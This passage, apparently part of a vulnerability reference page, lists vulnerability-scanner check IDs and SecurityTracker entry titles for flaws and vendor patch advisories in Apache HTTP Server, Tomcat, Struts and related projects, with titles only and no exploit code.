| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
| [900571] Apache APR-Utils Version Detection
| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
| [900496] Apache Tiles Multiple XSS Vulnerability
| [900493] Apache Tiles Version Detection
| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
| [870175] RedHat Update for apache RHSA-2008:0004-01
| [864591] Fedora Update for apache-poi FEDORA-2012-10835
| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
| [864250] Fedora Update for apache-poi FEDORA-2012-7683
| [864249] Fedora Update for apache-poi FEDORA-2012-7686
| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
| [855821] Solaris Update for Apache 1.3 122912-19
| [855812] Solaris Update for Apache 1.3 122911-19
| [855737] Solaris Update for Apache 1.3 122911-17
| [855731] Solaris Update for Apache 1.3 122912-17
| [855695] Solaris Update for Apache 1.3 122911-16
| [855645] Solaris Update for Apache 1.3 122912-16
| [855587] Solaris Update for kernel update and Apache 108529-29
| [855566] Solaris Update for Apache 116973-07
| [855531] Solaris Update for Apache 116974-07
| [855524] Solaris Update for Apache 2 120544-14
| [855494] Solaris Update for Apache 1.3 122911-15
| [855478] Solaris Update for Apache Security 114145-11
| [855472] Solaris Update for Apache Security 113146-12
| [855179] Solaris Update for Apache 1.3 122912-15
| [855147] Solaris Update for kernel update and Apache 108528-29
| [855077] Solaris Update for Apache 2 120543-14
| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
| [850088] SuSE Update for apache2 SUSE-SA:2007:061
| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
| [841209] Ubuntu Update for apache2 USN-1627-1
| [840900] Ubuntu Update for apache2 USN-1368-1
| [840798] Ubuntu Update for apache2 USN-1259-1
| [840734] Ubuntu Update for apache2 USN-1199-1
| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
| [835253] HP-UX Update for Apache Web Server HPSBUX02645
| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
| [835236] HP-UX Update for Apache with PHP HPSBUX02543
| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
5375| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
5376| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
5377| [835188] HP-UX Update for Apache HPSBUX02308
5378| [835181] HP-UX Update for Apache With PHP HPSBUX02332
5379| [835180] HP-UX Update for Apache with PHP HPSBUX02342
5380| [835172] HP-UX Update for Apache HPSBUX02365
5381| [835168] HP-UX Update for Apache HPSBUX02313
5382| [835148] HP-UX Update for Apache HPSBUX01064
5383| [835139] HP-UX Update for Apache with PHP HPSBUX01090
5384| [835131] HP-UX Update for Apache HPSBUX00256
5385| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
5386| [835104] HP-UX Update for Apache HPSBUX00224
5387| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
5388| [835101] HP-UX Update for Apache HPSBUX01232
5389| [835080] HP-UX Update for Apache HPSBUX02273
5390| [835078] HP-UX Update for ApacheStrong HPSBUX00255
5391| [835044] HP-UX Update for Apache HPSBUX01019
5392| [835040] HP-UX Update for Apache PHP HPSBUX00207
5393| [835025] HP-UX Update for Apache HPSBUX00197
5394| [835023] HP-UX Update for Apache HPSBUX01022
5395| [835022] HP-UX Update for Apache HPSBUX02292
5396| [835005] HP-UX Update for Apache HPSBUX02262
5397| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
5398| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
5399| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
5400| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
5401| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
5402| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
5403| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
5404| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
5405| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
5406| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
5407| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
5408| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
5409| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
5410| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
5411| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
5412| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
5413| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
5414| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
5415| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
5416| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
5417| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
5418| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
5419| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
5420| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
5421| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
5422| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
5423| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
5424| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
5425| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
5426| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
5427| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
5428| [801942] Apache Archiva Multiple Vulnerabilities
5429| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
5430| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
5431| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
5432| [801284] Apache Derby Information Disclosure Vulnerability
5433| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
5434| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
5435| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
5436| [800680] Apache APR Version Detection
5437| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
5438| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
5439| [800677] Apache Roller Version Detection
5440| [800279] Apache mod_jk Module Version Detection
5441| [800278] Apache Struts Cross Site Scripting Vulnerability
5442| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
5443| [800276] Apache Struts Version Detection
5444| [800271] Apache Struts Directory Traversal Vulnerability
5445| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
5446| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
5447| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
5448| [103122] Apache Web Server ETag Header Information Disclosure Weakness
5449| [103074] Apache Continuum Cross Site Scripting Vulnerability
5450| [103073] Apache Continuum Detection
5451| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
5452| [101023] Apache Open For Business Weak Password security check
5453| [101020] Apache Open For Business HTML injection vulnerability
5454| [101019] Apache Open For Business service detection
5455| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
5456| [100923] Apache Archiva Detection
5457| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
5458| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
5459| [100813] Apache Axis2 Detection
5460| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
5461| [100795] Apache Derby Detection
5462| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
5463| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
5464| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
5465| [100514] Apache Multiple Security Vulnerabilities
5466| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
5467| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
5468| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
5469| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
5470| [72626] Debian Security Advisory DSA 2579-1 (apache2)
5471| [72612] FreeBSD Ports: apache22
5472| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
5473| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
5474| [71512] FreeBSD Ports: apache
5475| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
5476| [71256] Debian Security Advisory DSA 2452-1 (apache2)
5477| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
5478| [70737] FreeBSD Ports: apache
5479| [70724] Debian Security Advisory DSA 2405-1 (apache2)
5480| [70600] FreeBSD Ports: apache
5481| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
5482| [70235] Debian Security Advisory DSA 2298-2 (apache2)
5483| [70233] Debian Security Advisory DSA 2298-1 (apache2)
5484| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
5485| [69338] Debian Security Advisory DSA 2202-1 (apache2)
5486| [67868] FreeBSD Ports: apache
5487| [66816] FreeBSD Ports: apache
5488| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
5489| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
5490| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
5491| [66081] SLES11: Security update for Apache 2
5492| [66074] SLES10: Security update for Apache 2
5493| [66070] SLES9: Security update for Apache 2
5494| [65998] SLES10: Security update for apache2-mod_python
5495| [65893] SLES10: Security update for Apache 2
5496| [65888] SLES10: Security update for Apache 2
5497| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
5498| [65510] SLES9: Security update for Apache 2
5499| [65472] SLES9: Security update for Apache
5500| [65467] SLES9: Security update for Apache
5501| [65450] SLES9: Security update for apache2
5502| [65390] SLES9: Security update for Apache2
5503| [65363] SLES9: Security update for Apache2
5504| [65309] SLES9: Security update for Apache and mod_ssl
5505| [65296] SLES9: Security update for webdav apache module
5506| [65283] SLES9: Security update for Apache2
5507| [65249] SLES9: Security update for Apache 2
5508| [65230] SLES9: Security update for Apache 2
5509| [65228] SLES9: Security update for Apache 2
5510| [65212] SLES9: Security update for apache2-mod_python
5511| [65209] SLES9: Security update for apache2-worker
5512| [65207] SLES9: Security update for Apache 2
5513| [65168] SLES9: Security update for apache2-mod_python
5514| [65142] SLES9: Security update for Apache2
5515| [65136] SLES9: Security update for Apache 2
5516| [65132] SLES9: Security update for apache
5517| [65131] SLES9: Security update for Apache 2 oes/CORE
5518| [65113] SLES9: Security update for apache2
5519| [65072] SLES9: Security update for apache and mod_ssl
5520| [65017] SLES9: Security update for Apache 2
5521| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
5522| [64783] FreeBSD Ports: apache
5523| [64774] Ubuntu USN-802-2 (apache2)
5524| [64653] Ubuntu USN-813-2 (apache2)
5525| [64559] Debian Security Advisory DSA 1834-2 (apache2)
5526| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
5527| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
5528| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
5529| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
5530| [64443] Ubuntu USN-802-1 (apache2)
5531| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
5532| [64423] Debian Security Advisory DSA 1834-1 (apache2)
5533| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
5534| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
5535| [64251] Debian Security Advisory DSA 1816-1 (apache2)
5536| [64201] Ubuntu USN-787-1 (apache2)
5537| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
5538| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
5539| [63565] FreeBSD Ports: apache
5540| [63562] Ubuntu USN-731-1 (apache2)
5541| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
5542| [61185] FreeBSD Ports: apache
5543| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
5544| [60387] Slackware Advisory SSA:2008-045-02 apache
5545| [58826] FreeBSD Ports: apache-tomcat
5546| [58825] FreeBSD Ports: apache-tomcat
5547| [58804] FreeBSD Ports: apache
5548| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
5549| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
5550| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
5551| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
5552| [57335] Debian Security Advisory DSA 1167-1 (apache)
5553| [57201] Debian Security Advisory DSA 1131-1 (apache)
5554| [57200] Debian Security Advisory DSA 1132-1 (apache2)
5555| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
5556| [57145] FreeBSD Ports: apache
5557| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
5558| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
5559| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
5560| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
5561| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
5562| [56067] FreeBSD Ports: apache
5563| [55803] Slackware Advisory SSA:2005-310-04 apache
5564| [55519] Debian Security Advisory DSA 839-1 (apachetop)
5565| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
5566| [55355] FreeBSD Ports: apache
5567| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
5568| [55261] Debian Security Advisory DSA 805-1 (apache2)
5569| [55259] Debian Security Advisory DSA 803-1 (apache)
5570| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
5571| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
5572| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
5573| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
5574| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
5575| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
5576| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
5577| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
5578| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
5579| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
5580| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
5581| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
5582| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
5583| [54439] FreeBSD Ports: apache
5584| [53931] Slackware Advisory SSA:2004-133-01 apache
5585| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
5586| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
5587| [53878] Slackware Advisory SSA:2003-308-01 apache security update
5588| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
5589| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
5590| [53848] Debian Security Advisory DSA 131-1 (apache)
5591| [53784] Debian Security Advisory DSA 021-1 (apache)
5592| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
5593| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
5594| [53735] Debian Security Advisory DSA 187-1 (apache)
5595| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
5596| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
5597| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
5598| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
5599| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
5600| [53282] Debian Security Advisory DSA 594-1 (apache)
5601| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
5602| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
5603| [53215] Debian Security Advisory DSA 525-1 (apache)
5604| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
5605| [52529] FreeBSD Ports: apache+ssl
5606| [52501] FreeBSD Ports: apache
5607| [52461] FreeBSD Ports: apache
5608| [52390] FreeBSD Ports: apache
5609| [52389] FreeBSD Ports: apache
5610| [52388] FreeBSD Ports: apache
5611| [52383] FreeBSD Ports: apache
5612| [52339] FreeBSD Ports: apache+mod_ssl
5613| [52331] FreeBSD Ports: apache
5614| [52329] FreeBSD Ports: ru-apache+mod_ssl
5615| [52314] FreeBSD Ports: apache
5616| [52310] FreeBSD Ports: apache
5617| [15588] Detect Apache HTTPS
5618| [15555] Apache mod_proxy content-length buffer overflow
5619| [15554] Apache mod_include priviledge escalation
5620| [14771] Apache <= 1.3.33 htpasswd local overflow
5621| [14177] Apache mod_access rule bypass
5622| [13644] Apache mod_rootme Backdoor
5623| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
5624| [12280] Apache Connection Blocking Denial of Service
5625| [12239] Apache Error Log Escape Sequence Injection
5626| [12123] Apache Tomcat source.jsp malformed request information disclosure
5627| [12085] Apache Tomcat servlet/JSP container default files
5628| [11438] Apache Tomcat Directory Listing and File disclosure
5629| [11204] Apache Tomcat Default Accounts
5630| [11092] Apache 2.0.39 Win32 directory traversal
5631| [11046] Apache Tomcat TroubleShooter Servlet Installed
5632| [11042] Apache Tomcat DOS Device Name XSS
5633| [11041] Apache Tomcat /servlet Cross Site Scripting
5634| [10938] Apache Remote Command Execution via .bat files
5635| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
5636| [10773] MacOS X Finder reveals contents of Apache Web files
5637| [10766] Apache UserDir Sensitive Information Disclosure
5638| [10756] MacOS X Finder reveals contents of Apache Web directories
5639| [10752] Apache Auth Module SQL Insertion Attack
5640| [10704] Apache Directory Listing
5641| [10678] Apache /server-info accessible
5642| [10677] Apache /server-status accessible
5643| [10440] Check for Apache Multiple / vulnerability
5644|
5645| SecurityTracker - https://www.securitytracker.com:
5646| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
5647| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
5648| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
5649| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
5650| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
5651| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
5652| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
5653| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
5654| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
5655| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
5656| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
5657| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
5658| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
5659| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
5660| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
5661| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
5662| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
5663| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
5664| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
5665| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
5666| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
5667| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
5668| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
5669| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
5670| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
5671| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
5672| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
5673| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
5674| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
5675| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
5676| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
5677| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
5678| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
5679| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
5680| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
5681| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
5682| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
5683| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
5684| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
5685| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
5686| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
5687| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
5688| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
5689| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
5690| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
5691| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
5692| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
5693| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
5694| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
5695| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
5696| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
5697| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
5698| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
5699| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
5700| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
5701| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
5702| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
5703| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
5704| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
5705| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
5706| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
5707| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
5708| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
5709| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
5710| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
5711| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
5712| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
5713| [1024096] Apache mod_proxy_http May Return Results for a Different Request
5714| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
5715| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
5716| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
5717| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
5718| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
5719| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
5720| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
5721| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
5722| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
5723| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
5724| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
5725| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
5726| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
5727| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
5728| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
5729| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
5730| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
5731| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
5732| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
5733| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
5734| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
5735| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
5736| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
5737| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
5738| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
5739| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
5740| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
5741| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
5742| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
5743| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
5744| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
5745| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
5746| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
5747| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
5748| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
5749| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
5750| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
5751| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
5752| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
5753| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
5754| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
5755| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
5756| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
5757| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
5758| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
5759| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
